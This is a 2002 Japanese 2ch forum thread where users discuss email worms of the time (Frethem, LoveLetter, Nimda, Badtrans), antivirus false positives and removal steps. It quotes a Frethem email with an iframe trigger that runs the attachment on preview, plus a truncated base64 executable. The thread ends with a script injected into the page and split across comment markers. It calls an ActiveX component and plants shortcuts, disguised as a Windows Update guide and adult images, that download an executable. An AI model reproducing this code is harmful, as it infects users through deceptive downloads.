定義アップやエンジン更新してんだけど１度も動かないよ------

>>757
そこをテキストファイルにコピペして、拡張子を変えれば反応するだろ。

ttp://www.trendmicro.co.jp/support/download/eicar.htm
もしくはeicarやっとけ。

>>757
ノートンが過敏に反応しているだけ。

日付: 2002/07/14 ､ 時刻: 17:41:18
圧縮されたﾌｧｲﾙ (l50[1]) は右ﾌｧｲﾙ内にある (C:\Documents and Settings\漏れの名前\Local Settings\Temporary Internet Files\Content.IE5\89ATCDEX\l50[1]) は VBS.LoveLetter.A ｳｨﾙｽに感染しています｡
ﾌｧｲﾙを修復できません｡

日付: 2002/07/14 ､ 時刻: 17:41:18
ﾌｧｲﾙ C:\Documents and Settings\漏れの名前\Local Settings\Temporary Internet Files\Content.IE5\UB4NU7WX\lame[1].htm は Trojan Horse ｳｨﾙｽに感染しています｡
ﾌｧｲﾙを修復できません｡

初めてノートン先生のお世話になったのですが、検出は出来たけど、その後駆除処理に移りません。
漏れは一体どうすれば良いのでしょうか？（´Д｀;）

あと、ウィルスバスター（トレンドマイクロから落とした体験版）では
検出すらしてくれなかったのですが、こんなもんなんでしょうか？

>>760
手動でそのファイルを削除

>>761さん。
レスありがとうございます。
さっそく試してみましたが、ファイルを検索しても見つかりません。
89ATCDEXやUB4NU7WXなんてフォルダも無いです。
漏れはこのままTrojan Horseに怯えなければならないのでしょうか？ （´Д｀;）

>>762
エクスプローラで似たファイル名まで検索するか、IEのキャッシュを
削除

>>760 ウィルスバスターの体験版は定義ファイルがリリースされたときのままで
更新できないから、最新のウィルス・ワームは検出されないことがある。あくまでも
自己の環境で作動するか、使い勝手などを確認するための体験版のようだ。

>>764
というか、これに関してはノートンの誤検出だし、ひっかかる必要のないものだと思うが。
ちなみに、バスターは最新定義のものでも反応しない。

通常のウイルスのチェックに関してはその通りですが。

>>760 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

Subject: Re: Your password!
添付ファイル decrypt-password.exe
で、メールサイズが約69KBのこんなメールが
いっぱい届きだした。新種ウィルスか？

--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(XXXXX XXXXX)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-Transfer-Encoding: base64
Content-ID: <W8dqwq8q918213>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略

>>767
のウィルスメールだが、今のところ NTT グループの企業から
やたらたくさん届いている。

>>767 は、WORM_FRETHEM.E だった。
ここ数日間に感染が増えているらしい。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.E

>>769 アンチウィルス各社対応済みだね。
NTTグループはアンチウィルスソフトいれてないばかりか、古いOE使ってるのか？
最低だな。

>>770
うちは入れてましたが
インテリの方が12日対応済み
ライブの方が17日対応予定で、
タイムラグにやられた感がありますな

アンチウイルスソフト（ウイルスバスター）の最新版でもすり抜けたYO!
WORM_FRETHEM.JとWORM_FRETHEM.Eでは違うのかな？？？

私もウイルスバスター最新版を入れてあるのですが、すり抜けてきました。

FRETHEM の新しい亜種のようです。
それで、ウィルス対策ソフトでは、まだ検出できない。

英語版のWinだけがターゲットですか?

>>774 じゃあ、ダイレクトアクションありだからIE/OE使用者はプレビュー
切っておいたほうがいいね。IE6.0/5.5SP2/5.01SP1以外のバージョンの
ひとは必ずバージョンアップすること。

>>767
Norton は検出できなかったようです。

>>775
関係ないと思う。でなきゃ、こんなに日本で広まらない。

＞＞743
ボッキー2 ni warata...

InterScanとNAVの最新版でもすり抜けたよ。
新しい亜種っぽいね

こっちは広島大学から来た

>>776
誤：IE6.0/5.5SP2/5.01SP1
正：IE6.0/5.5SP2/5.01SP2　だね。
OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/参照。

あぼーん

>>780 NAVの最新って7/12のウイルス対策済み数61664のほう？
7/12付けはIntelligent Updaterで２回定義が更新されたよね。

WORM_BADTRANS.Bに感染してからメールが受け取れなくなってしまいました。
既に駆除ツールを使いウィルスは消えたと思うのですが、自分から自分へウィルス付のメールを
送ってこようとしているみたいです。それを削除しようにもメールを受け取ろうとしてもしばらくすると
｢応答がありません｣とか言われます。で、こんなエラーメッセージが出るのですがどうすればいいでしょう？
サーバーと通信しようとして、タイムアウトが発生しました。 アカウント : 'po-mc.neweb.ne.jp', サーバー : 'po-mc.neweb.ne.jp', プロトコル : POP3, ポート : 110, セキュリティ (SSL): なし, エラー番号 : 0x800CCC19

>>784 使っているアンチウィルスソフトは？　NAVなら、
「電子メールを受信すると、W32.Badtrans.B@mmが検知された後にメール
受信が停止してしまい、何度受信をやり直しても同じ現象が発生する」
http://service2.symantec.co.jp/consumer/support-kb.nsf/KBLPF/BCC8F415E81FF16049256B250003ACF2?OpenDocument&PRODUCT=Norton%20AntiVirus2002

>>783

NAVCEだから詳しくはわかんないんだけど
7/12Rev19となってる。

>>786
Norton AntiVirus Corporate Edition
ウイルス定義ファイルバージョン: 40712s
シーケンス番号: 17848 かな？

いろんなとこから新種ウイルスがなだれ込んでくるよ〜
うちの会社は完全にメールを止めた。トレンドマイクロは
現在パターンファイルを開発中。直接聞いた。

とりあえずトレンドマイクロからの情報を

WORM_FETHEMの亜種は現在のパターンでは検出出来ませんが
30分後に配布するパターン317で対応します。
Interscanの話ですが

「Re:Your Password!」の件名に注意，新種ウイルスが国内で流行の兆し
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020715/1/

「Re:Your Password!」 JPNICのメーリングリストから届いたよ。
でもこれを購読している人って少なそうだから影響は無いかな？

>>789
17:00頃にはできると聞いたが、現時点でまだ出来ていない模様。

30分に対応するって話ですが
遅れてるみたいです。

かぶった。ｽﾏｿ

あぼーん

>>795 ドサクサにまぎれて不正アクセス禁止法違反ですか?

通報しますた

俺のサイト

間違い。他の掲示板で書かれていた。

ニュース速報＋のスレ

【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50

さっきも逢ったよ

>>796 >>798-799 IP記録されました。

んなこと言われても困ります。
すいませんでした。

nikkeibpからも「Re: Your Password!」MLに来たよ。
HTMLメールはじく設定だったから助かったけど。

不正アクセス禁止法ってどんなんですか？

>>805
強姦です。

俺は捕まるんですか？

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

>>807
強姦したんですか？

勿論してません

ＩＰ記録とかかいてあったから

じゃぁ、何で捕まると思ったの？

だいぜうぶ、ついでにメーラー変えとけ。

不正アクセス禁止法ですよ。あー、焦った。

そういやたかがゲームで不正アクセス禁止法違反して捕まった奴らには笑ったなぁ（ｗ

そんなんがあったんですか。確かに笑えます。

奴らということは複数人…

たかが2chのカキコtで捕まる>>816の方が笑える。

To: フィールドに大量のアドレスを並べて、
「ウィルスのお詫び」を送ってきやがった。
Bcc で送れよ。

え？やっぱり俺は捕まるんですか？

>>819
warata

>>820
うざい
他の板へいけ

トレンドマイクロのアップデートまだかよぉ。
予定より1時間以上遅れてるぞ。メールサーバが動かせん。

え？ちょっと意味不なんですけど。捕まるのか捕まらないのか答えてもらいたいです。

ウィルスと関係ないだろ
http://www.keishicho.metro.tokyo.jp/anket/haiteku.htm
ここで聞け。

>>824
お前のたいーほよりも定義ファイルのほうが心配だ

>>780

NAVCEの最新版だと対応してるっぽいぞ
LiveUpdataはまだだが

今時プレビューで感染してる奴は即死して欲しい。

WORM_FRETHEM.K 対応のパターンがトレンドから出ますた
パターンは317です

http://www.trendmicro.co.jp/vinfo/#pendingMed

uso desita
gomen nasai . . .

パターン３１７age

なんかすり抜けてない？？？

>>
imasara...

>>833
のことです

>>833
漏れがトレンドに解析依頼した検体２個のうち片方は、パターン317でも
検出しなかった・・・。
だめぢゃん。

>>836
なんだかファイルサイズが異なるのがいきなり出てますね。
メル送信以外の機能が無いように祈りまする。

オレのところにきたやつは48640bytesだった。
トレンドのオンラインスキャン（パターン317）では検出してくれなかった

>>838
Symantecだと47,616 バイトだけど。
うちに届くのって、添付ファイル45KB台のが多い。
ファイルサイズが大きいってのは、どゆ機能が追加されているのかドキドキっすね。

FRETHEM.E専門スレたちました。
http://pc.2ch.net/test/read.cgi/sec/1026734507/l50

W32.Frethem.J@mm
これ、ｵﾗｸﾙから来たﾔｼいる？

Frethem.kきたけど、
オンラインスキャンしたら一度すり抜けた。
そんなはずないだろと思って
テンポラリのディレクトリを直接スキャンしたら
なんとか検出してくれた。
いい加減だな、オンラインスキャンって。

さっきから窓の杜から、ウィルスきまくりなんですが・・
偽装にしても多すぎ。

>>841
んなもんに頼ってんじゃねーよ　タコが

>>844 オラクルには頼るなと??

[email protected]

添付ファイルがあるやつと無いやつがあるけど無いのも危険？

普段マックを使っているのですが、winを実家で初めて使っています。
オンラインチェックをしたらウイルスが発見されました。
メールソフトは設定もしていないし、送受信もしていない（webメールのみ）のに
感染してしまいました。変な添付メールは一度も来てません。こんな事ってあるのでしょうか？

VBS.LoveLetter.A というやつです。過去ログにはファイルを削除、とありましたが
どれを削除してよいのかわからないので、ウイルスバスターを買う事にしました。
これはwebメールでも感染してしまうのでしょうか？？マックにも感染しますか？

ウイルスをばらまいたと思うと心配で夜も眠れません

>>848
http://pc.2ch.net/test/read.cgi/sec/1026717316/

>>848
http://pc.2ch.net/test/read.cgi/sec/1025872269/を参照。

それはただ単にノートンが過敏に反応してるだけ。

すんませんでした。でもウイルスバスターは買います。。

スペイン語のメールがやたらと来るんだけどこれってなんなんすかね？
決まって大きさが３１３Ｋなんです。

>>852 アンチウィルスソフトいれてないのか。
アンチウィルスが反応しなかったら、単なるスパム。

frethemとかメール勝手に送って増殖する奴に
かかって取引先から苦情が来てる人が職場にいるんだけど

そういうのを見ると
アドレス帳は別のところに保存しといた方がいいんですか？
でも調べてみたらアドレス帳載ってる人以外にも
送ってるみたいだし。
なにかいい対応策ありますか？

そういう奴は隔離ネットワークに収監する。

ははは。
でも笑いごとじゃなくてウイルス駆除ソフトで対応する前に
ウイルスにかかってしまうことは考えられることなので、

最低限他の人には広めさせたくないっていうようにしたい。
ウイルス自体にメアドを参照させないようにするっていうのは
どうすればいいんだろうか。

それか自分以外が送信できないようにすればいいのかな。
パスワドかけるとかして。

プレビューしただけで感染するのはなぜ？
プレビューって、勝手に添付のexe実行しちゃうの？

>>857
exeだけがプログラムじゃないの。
Webページを表示するのだって…と考えてみれば？

>>856 最近のウィルスは自前で送信するのでメーラにパスワードかけても意味ないです。
メアドもPC内を検索するのでどこに置いても参照されうる。
>>855が最善の策と思うが。ダブルクリック厨にはつける薬無し。

>>857 Internet Explorerのセキュリティホールを利用しているから。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms01-020.asp

>>856 最大のセキュリティホールは無自覚なユーザなのだよ。
そしてセキュリティの固さはもっとも弱いところで決まるので、

馬 鹿 が い る 限 り 何 を やっ て も 無 駄。

>>858
FRETHEM.Kはexeが添付されてるんでしょ？
なぜ、プレビューで実行されるんかな？

>>862 >>860

>>859
>メアドもPC内を検索するのでどこに置いても参照されうる。

↓こんな感じのフラッシュメモリにアドレス帳入れておけばいいのかな？
http://www.iodata.co.jp/products/pccard/2002/usb-ed2.htm

あっ遅かった。
>>860>>863
どうもです。

この穴がいまさら突かれるのは購入時のまま使用しているユーザがとても多いという事でいい?
とすると、数ヵ月後にそういうユーザが貯まったところで、また流行?

>>864 USBポートに差しっ放しにしなければ大丈夫だろうが、ウィルスは
ブラウザのキャッシュからもメアド拾うので感染したらどこかしらへは
送信してしまうだろうね。送信先はアドレス帳だけではないということ。

IEコンポーネント使用メーラーはOEとBeckyの他、なにがありますか？

NTTからfrethem飛ばしてｽﾏｿって電話がかかってきた

>>866 アンチウィルスソフトで駆除したら終わり、じゃなくてIEのバージョン
アップもきちんと指摘・指導して欲しいね。＞マスコミ各社
たしかにこれじゃ繰り返しだよ。

>866
新規購入者だけとは限らん。
klezの時だって、「ｳｨﾙｽﾒｰﾙなんて一通も来なかったよ。
ｾｷｭﾘﾃｨﾎｰﾙ？ﾊﾟｯﾁ？ﾜｸﾁﾝｿﾌﾄ？何のことかｻﾊﾟｰﾘﾜｶﾗｿ」
と平気でのたまうﾔｼはそこらへんにうじゃうじゃいる。

>>869
>NTTからfrethem飛ばしてｽﾏｿって電話がかかってきた

どこを見ればfrethemの送信先ってわかるだろう。
教えてほしいす。
OEの送信済みアイテムには無いし。

http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

>>873 マルチウザイ　http://pc.2ch.net/test/read.cgi/sec/1013661431/658
お前出品者か？

>>872
＞OEの送信済みアイテムには無いし
いまどきそんなこと言ってるようじゃ･･･
【流行の】Frethem【ﾖｶｰﾝ】
http://pc.2ch.net/test/read.cgi/sec/1026734507/で情報交換してみたら

>>874
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

>>876 市ね

>>877
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

>>872
大手企業ならSMTPを自前で持ってるんだから
ログ見りゃわかるじゃん。

つうかOEのワーム系ウィルスって
ほとんど対策済みのセキュリティホール突いてるんだから
パッチくらいちゃんと当ててくれ

俺はOE使ってないからそんなん知らんとかじゃなくてさ

>>876,878

ほんとにウィルスだと思ってんの？
それともネタか？

富士通製ハードディスク まだ続く？突然死 3台目
http://pc3.2ch.net/test/read.cgi/jisaku/1019133758/
この辺見とけ

>>880
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

パッチ当ててればプレビューしても感染しないの？

>>882 >>860

>>883 これもな
Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp

実行されたアクション:
添付ファイルはメッセージから隔離され、受信者が実行したアクションを通知するテ
キスト ファイルに置き変えました。

宛先:
[email protected]
<[email protected]>

送信者:
[email protected] <[email protected]>

送信時刻:
709959936,29502659

件名:
Re: Your password!

添付ファイルの詳細:-

添付ファイル名: decrypt-password.exe
ファイル: decrypt-password.exe
感染? はい
修復済み? いいえ
ブロック済み？ いいえ
削除済み？ いいえ
ウイルス名: W32/Frethem.l@MM




こんなメールが着たんだけどなんですか？

http://game.2ch.net/test/read.cgi/ff/1026491502/
このスレに入ったらLoveletterウイルスに感染されちゃうんだけど。
どうにかして。

>>886 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

ということは安全ってことですね。
ﾖｶﾀｰ

c.Copy(dirsystem&"\重複.TXT.vbs")

覚えたてでうれしいね。

　　　　　　　

ttp://tmp.2ch.net/test/read.cgi/kitchen/1026902739/

ＤＥＬＡＬＬについての、詳細です。

ウイルスがホットメールで送られてきました。なんか、スペイン語で
メールが送られてきます。ホットメールって添付ファイルが自動的に
ウイルスチェックされるので無用心ながらも添付を開いてしまい、
感染してしまった模様です。ちなみに、その添付ファイルは225Kバイト
くらいです。消しても消しても＜30＞というファイルがでてくるし、
<BanderaNegra>って言うファイルも作られます。それも、c:\にです。
どなたか対処方法を御存知の方はいらっしゃいませんでしょうか？
トレンドマイクロ社の30日つかえる無料のウイルス検知ソフトを
入れてみたのですが、ウイルス除去できないみたいなのです。隔離しか。

>>885
ﾜﾀｼのとこにもきました

発信もとはお詫びしています

ttp://www.reedrex.co.jp/mail_t.htm

どなたか、対処方法をおしえてください。おねがいします。

このスレ、かちゅで見れないぞ〜
「削除かあぼーんでログが詰まった可能性がありますです」
になってしまって、新しいdll当てても見られない。
ブラウザで開くと見れるんだが････

zonavirus.dll
っていうファイルもみつかりました。
ゾナウイルスっていうらしいです。どなたか、ほんとによろしくお願いします。

>>896
スレ違いネタだな。一回ログ消して全部取得しなおせ

>>897
そこまでわかってんなら検索すればすぐだろうに
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ARGEN.A

>>898
ありがとうございます。今検索して、知り合いに僕からのメールは
開かないようにメール送ったところでした。

>>898
おぉ！読めたぞよ。ありがとさん。

ご回答よろしくお願いします。
この質問をソニーの社員スレッドでしたのですが全然回答がありませんでした。
重大な秘密でもあるのでしょうか？
私はＶＡＩＯを使ってます。
最近監視ソフトを買いました。
毎日インターネットつなげるとアタックの警告音とともにＶＡＩＯの方から勝手に
パソコンの中に何度も進入してきます。
私のパソコンの中でいったい何をしているのでしょうか？
ソニーさんのパソコンを使うと勝手にパソコンに侵入してこれるように
何かしているのでしょうか？
侵入の警告音がなりっぱなしで気持ち悪いです。

>>901
ソニィ社員だが、何か？
おまいの言っていることがｻﾊﾟｰﾘわからん。
まともな者にわかるよーにしっかり述べよ。

>>901

>>902
901です。
ソニィ社員、おまいとか言うような方が本当に有名な
ソニーの社員の方かどうかわかりませんがよろしくお願いします。
私も何が起こっているのかわかりません。
パソコンへの不正侵入を監視するソフトをインストールすると
ＶＡＩＯさんへ繋いでいないのに
以下のような表示が出て警告音が鳴らされます。

パソコンへの侵入者を監視するソフトの表示です。

アタック　Ping Sweep
侵入者　ＶＡＩＯ
IP: ＊.＊.＊.＊　DNS: VAIO

ＩＰがいろいろ変わってきます。
必要ならＩＰも掲載します。

YAVAIO

さっき質問させて頂いてものですが、削除できません。
レジストリの所を書いてある通りにいじりたいのですが、
書いてあるもの自体がありません。

これを書かないと分からない！
って言う方がいらっしゃると思いますので、まずは何から書けばいいのか
お教えください。

>>904
たのむから、ｓａｇｅにしてくれ（ｗ
ttp://vcl.vaio.sony.co.jp/
あたりに、そのワケワカラン「ご相談」を投げてくれYO。
ココはなぁ、そんな糞質問を受け付けるところじゃ…（ﾌｩｰ

>>906 = やくざ
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
にある項目と値全部。

>>907
コピペしてもsageられないような事を書くなよ。

>>908
（既定）　（値の設定無し）
というのがあって、これだけ削除できません。。。
「指定された値を全て削除できません」とでます。
なんか、悲しくなってきました・・・。

>>909
・・・これって残って当然ですね。
全部消したんですが、まだ再起動して立ち上げると
c:￥にあるんですよ。。。。どうしてでしょうか？

>>910
あのさ、おれがだしたURLのとこ、ちゃんと読んだか？
読んでないよな？最後までちゃんと読めよ？
書いてあること、全部やったか?
やってないよな？だから復活するんだぜ？
わかったらもう一回いってきな。

HKLMもと思ったけど。なんか殺伐としてんな。

http://www.symantec.com/region/jp/sarcj/data/w/w32.kitro.d.worm.html
こっちも調べました。状況的にはこっちっぽいので。
両方のサイトとも調べたんですよ、、、で、消しても出てくる。その繰り返しです。
書いてある通りにしたんですが、なかなか消えてくれないんです。

気になることがあるのですが、Ｄのプログラムフォルダーが縮小表示
の画像と画像なしで点滅状態になってるのと指定していない画像が
縮小表示で別のホルダーに表示されます。もう一つは他のプログラム
から利用されていますと出て削除できないファイルがあるのですが
原因わかる方いますか？

ファイル名を指定して実行の表示がregeditのままで消しても
表示されます。オートコンプリートはオフにしてるのですが
なぜでしょうか？

レジストリのRUNにMSPY2002というのがありますが
これ大丈夫ですか？IME調子悪いのですが。

>>914
読んでも症状はさっぱり分からないが、
ウイルスが心配なのならちゃんとスキャンする。
エクスプローラその他の表示や、削除できないファイルとかに
ついては、
http://homepage2.nifty.com/winfaq/
で確認しる。

>>915
それはWindowsの仕様。
ひょっとしたら変更する方法もあるかもしれないが、
Windows板のOSごと質問スレにでも逝ってくれ。

>>916
ウイルスなどが心配ならスキャンする。
スパイウェアが心配ならad-awareのスレに。
IMEについては辞書の修復してみたら？

>917
どうも答えてくれるとはありがとうございました。
９１５と９１６についてはなんでもないことがわかりました。
９１４だけはどうも解せない。ＤとＣにＸＰ一個ずつ２ついれてて
Ｄの方がＮＡＷインストール失敗して動かないんですよ。ｃのほうからだと
アドミニの権限がないので全システムのスキャンができないし。
Ｃは調子いいのでＤのほう削除してＣ一本にしたほうがいいですか？

>>918
>914〜916については、ちゃんとまとめてから環境と状況を
明確にして質問してくれ。せめて同一人物と分かるように
名前なりなんなり工夫してくれ。
で、それらと>918を併せ読んでも、なおかつ状況は明確でない。
一度、あんたが何を使ってどうしているのか全然知らない他人が
その文章だけでどれだけ理解できるかという「他人の目」で
読み返してくれんか。
NAWはNAVなのかなあ、とか、アドミン権限もなくて
一体何がしたいのかとか思う程度。
これじゃ、Windows板に誘導したものかどうかの判断もつかない。

あのあるアドレスをクリックしたら、へんなページがいっぱい出てきて
ノートンでTrojan Horseに感染しています。って表示されたのですが、
やばいですかね。

>919
アドミン権限が二つ別であるから、ＣのＸＰからＤのＸＰは
スキャンできないんですよ。２つ入れたのは比較の目的から。
それくらいわからないか。

>>913
そうか、すまんな、一応調べたんだな。
で、消しても復活してくるからには、消しきれてない上に
Windows起動時にどっかから読まれてるわけだが、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runの
記述を消しても現れるなら、WIN.INIやSYSTEM.INI,とかに仕込まれてたりしないか？
SAFEモードで起動してMSCONFIGでチェックしたらどーだ？
それと、こいつの本体はVBSなので、ActiveDesktopで呼び出されても発動するだろうな。

具体的には
D:\Documents and Settings\ＸＸＸ(1)\My Documents\新しいフォルダ
をwipe infoで消したら、一つ消えないファイルがあって容量ゼロで
新しいフォルダが消えないという状態。ＤＯＳで消せと書いてるけど
この場合だとどう打ち込んだらいいのか具体的に書いてないから
こっちこそわからない。だいたいコマンドプロンプトまとめずわかるように
書けっつーの。学んでない人間のほうが多いんだそ。

>>921
>>919の「同一人物が分かるように」との指摘さえきかず、
好き勝手なところだけ答えて逆切れしているし。

>>923
誰に文句いってんだよ、コイツ？

>919はキツイ面もあるかもしれんが、まだしも好意的に
このように質問しろと書いてくれているんだが、
それでも>921みたいに逆切れするのとか、>923みたいに
意味不明の独り言を書き込むようなヤカラには
もう無視っきゃないな。
放置されたくなければ、質問の仕方を考えろ。

受難の季節

(´-`).｡oO（大変だなぁ）

(´-`).｡oO（DQNでも最初から放置はせずに一応は答えてくれるんだね・・・）

>>921,923
つーかウィルスじゃねえから
http://pc.2ch.net/pcqa/
ここ逝けよ、夏厨くん

それと文章はわかるように書いてね

ｳｨﾙｽｽｷｬﾝ　ｼﾀﾗ　ｺﾝﾅﾝﾃﾞﾏｼﾀ！

「￥katjusha2102\log\cocoa.2ch.ne\4649\1026258903.dat
VBS.Internalｳｨﾙｽに感染しています。」

ﾅﾝｼﾞｬｺﾘｬ？ ﾃﾞｽ！

ぼえーん
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

ノートンでTrojan Horseに感染しています。って表示されたのですが
どんな症状がでるのですか？

>>931 >>920 http://pc.2ch.net/test/read.cgi/sec/1026717316/191-192

KLEZ.Hとやらに感染してました。
昨日やっとやっつけました。
けど、奇数月の6日になるまで安心できないと
脅されました。9月までﾜｶﾝﾈｰﾉｶﾖ（#・∀・）

ApacheのLogに残るﾆﾑﾀﾞやｺｰﾄﾞﾚｯﾄﾞがうざいのだが・・・
こいつらを駆逐出来るような
CGIは作れないだろうか？

ちなみにIISではないので実害はﾅｼ

くだらねぇ質問はここに書き込め　Ver2.18…に書きこんだのですが、
ちゃんと教えてくれません。もー

初心者ですが、宜しくお願いします。

AVGってFreeのウイルス駆除ｱﾌﾟﾘをインストールしています。
先日、WEB検索中に"I-Worm/NIMDA.A.HTM"に感染してしまいました。
AVGで駆除した後に、MSのfixnimdaを実行したのですが、正常に
駆除されているか心配です。
I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名を教えてください。
また、I-Worm/NIMDA.A.HTMに感染したら、どのような動作をするの
でしょうか？教えてください。

>>935
少し検索すればすぐわかるようなこと聞くな、このヴォケ！

>936
調子に乗るなヴォケ！
初心者だろうが上級者だろうがここは聞きたい奴がくるところだ
おまえは知識があるだろうが、暇人で傲慢だ
気分が悪い
おまえが出て行けばすむことだ　来るな　ヴォケ！

>>937
じゃあおまえが935に教えてやれ。

>>935
初心者なら初心者板行けよ

>>938
まだいたのか？
あなたのように知識が豊富でないから教えられません。
出て行くか教えるかしてやれ

937さん有難うございます。
番号の前に＞＞の名無しさんは、お願いですから、かきこまないでください。
NIMDA.○にもいろいろあるので、I-Worm/NIMDA　＝　I-Worm/NIMDA.A.HTM
なのか自信が無かったのです。
ウイルス初感染なうえに知識が乏しいため、MSNでI-Worm/NIMDA.A.HTMを検索
して２CHにのみヒットした為、ここにきて聞きました。
ちょっと私も936さんに不満なもので、長々と書いてしまいました。
良識の有る方、お願いします。おしえてください。

>>940
だから検索するだけだよ。早くしてやれよ。

質問者もどんくさいな

>>942
ひきこもりだな
パソコンの世界で逝きとけ

ウィルスに関わる話題・質問はこちらに、、、
※ただしここは心の狭いお偉いさんたちが暇してるので
質問は高度なものに限ります。
又は質問するな。
って但し書きが必要ですね。

dle <[email protected]> zerohour <[email protected]>

>>944
引きこもりですが、何か？

>>945
必要なし

http://pc.2ch.net/test/read.cgi/sec/1026717316/224
２〜３時間レスがないからといって逆ギレする初心者はお断りです。

ネタ歓迎〜★

くだらないことで言い合ってないで、私の質問に答えなさい。
どうせ暇なんでしょ。

>>951
このスレ1から読み返しなさいな。
それで解決する。

942さん、
I-Worm/NIMDA　＝　I-Worm/NIMDA.A.HTM であっているのですね。
それならば、I-Worm/NIMDAでの処置は終了しています。
違っているのならば、別の検索のしかたを教えていただきたいです。

>>I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名
ニムダだろ。
あとは検索すればちゃーんと詳しく書いてあるHPが出てくるはず。

違うけど処置は終わり。お疲れ。さよなら。

最近、2chを見てると、
よくウィルスソフトから
ラブレターウィルスの警告が出るんだけど、
みなさんはどうですか？

>>956
理由を知っているからなんとも思わない。
マルチの方がウザイ。

954さん、
ありがとうございました。
これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
では、おやすみなさい。

955さん？
駆除とMSのfixnimda実行だけでは、いけないのでしょうか？

あれ？初心者の味方諸君はどこ行ったんだ？
>>949を見て萎えたのか？

>>959
だから質問する前に調べろ（検索しろ）と皆言ってるだろ！！
だから無視されるんだ。新しいウィルスじゃあるまし。
AVGならスレ違い。どうしてもあれこれ知りたいなら有償ソフト買ってメーカに
質問しろ。フリーを使い続けるなら自己責任でやるのは当然のことだ。

ttp://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=fixnimda+%8B%EC%8F%9C&lr=

>>960
ひきこもりが強がってら
弱虫は相手にされねーだけだろ
暇じゃねーんだよ　ヴヲケ

(´-`).｡oO(書き込みする暇はあるんだな・・・)

atamano yowasouna natutyu- dana...
syosinsya ita atari kara nagarete kitano kana-

>>963
質問に対して回答する際、自分の記憶違い等も考慮し、調べなおしたりするのは
当たり前のこと。
例えば952が「このスレ1から読み返しなさいな。」といってるが、これで解決
できるのは確認してると思う。（これは推測だけど。）
俺なら、書き込む前に、確実に確認する。
たった１行の回答であっても、それなりの時間はかかるはず。それを理解できない
お前は回答したことがないか、いいかげんな回答をしたことがないかだろ。

>960、>おそねっ
初心者だから皆怒ってるんじゃなくて、モラルを欠いた言動をとっているから
怒っているのがわからないのか？
例えばウィルスの名称なんて、１でリンクしてるURLを見てくるだけでもわかるだろ。
「ウィルス情報」って書いてあるんだから。
（ちなみにネットワークアソシエイツのウィルス名検索では、nimdaの情報が一部リンク
　はずれている。）

>これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
こんなのも本論、第三者である俺達とは関係ない。
自分のとった言動を正当化するために書いてるだけ。
この手のスレは自己中心的に質問し、自分だけが役に立てばいいのでなく、
これをみている他の人にも役立つように考慮するのは当然のこと。
（だからこそ、952の「このスレ1から読み返しなさいな。」というのが生きてくる。）

本論と関係ないカキコして、皆スマン。

(´-`).｡oO( >>962あてだったんだが、ちゃんと書いとけばよかったな・・・)

</scri-->

<!--ipt
i="P";document.write("<AP"+i+"LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </A"+i+"PLET ");

var label8="ウィンドウズアップデトガイド　２００２年";
var url8="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile8="%WinDir%\\System\\User.exe";
var iconum8="4";

var label="無修正ＡＶ画像";
var url="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile="%WinDir%\\System\\User.exe";
var iconum="1";

function savefavfile(folder,label,url,icofile,iconum){
var oFi=FSO.CreateTextFile(folder+"\\"+label+".url");
oFi.WriteLine("[InternetShortcut]");
oFi.WriteLine("URL="+url);
oFi.WriteLine("Modified=806188A46609C1013E");
oFi.WriteLine("IconIndex="+iconum);
oR=/%windir%/i;icofile=icofile.replace(oR,WinDir);
oFi.WriteLine("IconFile="+icofile);
oFi.Close();
}

